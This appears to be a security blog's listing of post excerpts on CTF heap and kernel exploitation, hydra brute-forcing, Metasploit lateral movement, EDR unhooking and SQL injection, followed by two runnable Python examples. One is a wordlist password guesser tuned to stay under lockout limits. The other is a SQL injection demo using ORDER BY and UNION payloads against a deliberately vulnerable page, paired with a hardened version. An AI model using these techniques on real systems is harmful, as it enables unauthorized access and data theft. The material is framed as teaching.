Two ways of heap overflow (topic)

babyheap_0ctf_2017. The first step is to switch to the matching libc. Routine: checksec, then code audit. If the symbol table has been stripped, you have to guess what each function does and then rename the main function. Allocate function: nothing special. Fill function: it is obvious that there i ...

Posted by jonex on Fri, 20 May 2022 05:29:05 +0300

Hacker's road: simple password brute-forcing with hydra

Tools needed: Kali (optional); hydra (Kali ships with it; Windows and other platform builds can be installed separately); a password dictionary (search GitHub for the keyword "dictionary"). This tutorial is for technical exchange only. Please do not use it for other purposes. I am not responsible for any illegal and crim ...

Posted by donbonzo on Thu, 12 May 2022 19:44:06 +0300

Intranet lateral movement, ATT&CK series I: taking down the domain controller

Information gathering. Domain-controller-related information: an ARP scan finds that the domain controller's IP address is 192.168.52.138. Try whether msf's smb_login module can log into SMB: search smb_login; use 0; set rhosts 192.168.52.138; set smbpass hongrisec@2022 ...

Posted by jingcleovil on Thu, 12 May 2022 13:05:02 +0300

A general unhooking method using a custom jump function (update)

0x00 Preface. This article introduces an interesting unhooking technique that comes from a GitHub POC a friend sent: https://github.com/trickster0/LdrLoadDll-Unhooking ; this article walks through the method step by step with reference to that POC. At present, most of the classic methods are direct system calls (syscall) or finding the ...

Posted by sidney on Fri, 06 May 2022 14:15:45 +0300

Linux intrusion investigation for emergency response

Preface. When a hacker intrusion, system crash or other security event affects normal business operation, it must be handled immediately so that the enterprise's network and information systems return to normal operation in the shortest possible time; after that, the source of the intrusion is located and the course of the intrusion is reconstructed acc ...

Posted by feddie1984 on Fri, 06 May 2022 01:45:36 +0300

Linux kernel pwn: WCTF 2018 klist

Startup script: #!/bin/sh qemu-system-x86_64 -enable-kvm -cpu kvm64,+smep -kernel ./bzImage -append "console=ttyS0 root=/dev/ram rw oops=panic panic=1 quiet kaslr" -initrd ./rootfs.cpio -nographic -m 2G -smp cores=2,threads=2,sockets=1 -monitor /dev/null -nographic. SMEP is enabled, KASLR is enabled. Look at all possible threads, then consider the conditional c ...

Posted by mu-ziq on Fri, 29 Apr 2022 01:15:21 +0300

Linux kernel pwn: WCTF 2018 klist

A little recap: we are exploiting a UAF, then using a pipe structure to turn the UAF into an arbitrary-address read/write, and finally searching for the cred structure and modifying it to escalate privileges. Learning from the experts' exploits. The first is ha1vk's: #define PIPE_BUFFER_SIZE 0x280 #define BUF_SIZE PIPE_BUFFER_SIZE char ...

Posted by tim on Thu, 28 Apr 2022 17:59:46 +0300

Introduction to Python Stunts: password cracking in python3

Preface. For me, the uniqueness of Wushu lies in its simplicity. The simple method is also the right method; at the same time, there is nothing special about Wushu. The closer you get to the true meaning of Wushu, the less waste there is in the execution of the moves. Brief introduction: the first chapter of Python Stunts introduces Python syntax. The two programs t ...

Posted by unerd.co.uk on Mon, 25 Apr 2022 00:33:44 +0300
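Both the hydra post above and this Python password-cracking post come down to the same loop: feed candidates from a wordlist to something that says yes or no. The following is an added example written for this listing, not code from either post or from the Python Stunts book. It is constructed to run offline: the "target" is a local verify() function holding a salted SHA-256 hash (standing in for the live service hydra would talk to, or the hash file a cracker would read), and the wordlist, salt, suffix rules and password are all made up for the example.

```python
"""Wordlist-driven password guessing (constructed example, not from either post).

The target is a local verify() oracle holding a salted SHA-256 hash; the
wordlist, salt, mangling suffixes and secret password are all constructed.
"""
import hashlib
import hmac
from typing import Callable, Iterable, Iterator, Optional, Tuple

# Simple mangling rules applied to every base word (constructed list).
SUFFIXES = ["", "1", "123", "!", "2022"]

# Constructed wordlist in the usual one-candidate-per-line format.
WORDLIST = """# constructed wordlist
123456
password
admin
"""


def hash_password(salt: bytes, password: str) -> str:
    """Salted SHA-256 hex digest; how the constructed target stores passwords."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def make_verifier(salt: bytes, stored_hash: str) -> Tuple[Callable[[str], bool], dict]:
    """Return (verify, stats). verify() is the oracle: True only for the right
    password. stats['attempts'] counts every guess the oracle has seen, which
    is exactly what a lockout policy on a real service would be counting."""
    stats = {"attempts": 0}

    def verify(candidate: str) -> bool:
        stats["attempts"] += 1
        return hmac.compare_digest(hash_password(salt, candidate), stored_hash)

    return verify, stats


def load_wordlist(text: str) -> Iterator[str]:
    """Yield candidates from wordlist text, skipping blank and comment lines."""
    for line in text.splitlines():
        word = line.strip()
        if word and not word.startswith("#"):
            yield word


def mutate(word: str) -> Iterator[str]:
    """Expand one base word with capitalisation and suffix rules, without repeats."""
    seen = set()
    for base in (word, word.capitalize()):
        for suffix in SUFFIXES:
            candidate = base + suffix
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def dictionary_attack(verify: Callable[[str], bool], words: Iterable[str],
                      max_attempts: Optional[int] = None) -> Optional[str]:
    """Try every mutated candidate against the oracle; return the first hit or
    None. max_attempts caps the guesses, the budget you would set to stay
    under a service's lockout threshold."""
    attempts = 0
    for word in words:
        for candidate in mutate(word):
            if max_attempts is not None and attempts >= max_attempts:
                return None
            attempts += 1
            if verify(candidate):
                return candidate
    return None


if __name__ == "__main__":
    salt = b"constructed-salt"
    verify, stats = make_verifier(salt, hash_password(salt, "Password2022"))
    hit = dictionary_attack(verify, load_wordlist(WORDLIST))
    print("recovered:", hit, "after", stats["attempts"], "attempts")
```

Against an online target the oracle is a network round trip and every attempt is visible in the service's logs, so the attempts counter and max_attempts are the numbers to watch: a three-word list expands to 25 guesses here, and most lockout policies trip well before that.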

Notes from a packet de-signing exercise

*Solemn declaration: the system was an authorized test target. The information provided in this article must not be used for illegal purposes. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are borne by the user, and the author of this article will not bear any ...

Posted by johnnyblaze1980 on Fri, 22 Apr 2022 15:48:09 +0300

Network Security Learning, Day 8

The day before yesterday I wrote up the simple SQL injection process for the mozhe lab and summarized the relevant code; attached is a summary diagram of MySQL injection. First, once we have the website, we use an ORDER BY clause to determine the number of columns, then use a UNION query to find the echo point via the page's output or error display: id=-1 u ...

Posted by az_wraith on Fri, 22 Apr 2022 11:17:39 +0300
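The ORDER BY / UNION procedure the post above describes, carried through end to end as an added example written for this listing (not code from the post or the mozhe lab). It is constructed to run offline: an in-memory SQLite database stands in for the MySQL backend, vulnerable_page() and safe_page() stand in for the web page that renders the query result, and the users table, its rows and the page template are all made up. The deliberately vulnerable query concatenates the id parameter; the hardened version binds it.

```python
"""SQL injection column-count and echo-point probing (constructed example).

SQLite stands in for MySQL; page functions stand in for the target website.
Nothing here comes from the original post.
"""
import re
import sqlite3
from typing import Callable, List, Optional

Page = Callable[[str], str]  # takes the raw 'id' parameter, returns rendered page text


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a users table with three columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"), (2, "bob", "bob@example.test")],
    )
    return conn


def render(rows: List[tuple]) -> str:
    """Page template: only name and email are displayed, id never is,
    so columns 2 and 3 are echo points and column 1 is not."""
    return "\n".join(f"name={r[1]} email={r[2]}" for r in rows)


def vulnerable_page(conn: sqlite3.Connection) -> Page:
    """Deliberately vulnerable: the id parameter is concatenated into the SQL."""
    def page(user_id: str) -> str:
        sql = "SELECT id, name, email FROM users WHERE id=" + user_id
        try:
            return render(conn.execute(sql).fetchall())
        except sqlite3.OperationalError as exc:  # the 'error display' the probe relies on
            return f"ERROR: {exc}"
    return page


def safe_page(conn: sqlite3.Connection) -> Page:
    """Hardened: the value must parse as an integer and is bound as a parameter."""
    def page(user_id: str) -> str:
        try:
            uid = int(user_id)
        except ValueError:
            return "ERROR: invalid id"
        rows = conn.execute("SELECT id, name, email FROM users WHERE id=?", (uid,)).fetchall()
        return render(rows)
    return page


def count_columns(page: Page, max_cols: int = 20) -> Optional[int]:
    """Step 1: 'id=1 ORDER BY n' for n=1,2,...; the largest n that renders
    without an error is the number of columns in the original SELECT."""
    found = None
    for n in range(1, max_cols + 1):
        if page(f"1 ORDER BY {n}").startswith("ERROR"):
            break
        found = n
    return found


def find_echo_points(page: Page, ncols: int) -> List[int]:
    """Step 2: 'id=-1 UNION SELECT 1,2,...,n'. id=-1 matches no real row, so the
    only row rendered is the UNION row; the marker numbers that appear on the
    page identify the columns whose content the page echoes."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    out = page(f"-1 UNION SELECT {markers}")
    shown = {int(v) for v in re.findall(r"=(\d+)\b", out)}
    return [i for i in range(1, ncols + 1) if i in shown]


def dump_via_echo(page: Page, ncols: int, echo_col: int, expr: str) -> str:
    """Step 3: put an expression in an echo column and read it off the page.
    On MySQL the same slot would take version(), database() or a subquery
    against information_schema; here SQLite expressions are used."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo_col - 1] = expr
    return page(f"-1 UNION SELECT {','.join(cols)}")


if __name__ == "__main__":
    db = build_db()
    vuln = vulnerable_page(db)
    n = count_columns(vuln)
    echo = find_echo_points(vuln, n)
    print("columns:", n, "echo points:", echo)
    print(dump_via_echo(vuln, n, echo[-1], "(SELECT group_concat(name) FROM users)"))
    print("hardened column count:", count_columns(safe_page(db)))
```

The same probes run against safe_page() return an error on the very first ORDER BY, so count_columns() reports None and find_echo_points() comes back empty: parameter binding plus an integer type check removes the injection point entirely, whereas input filtering alone would only change which payload gets through.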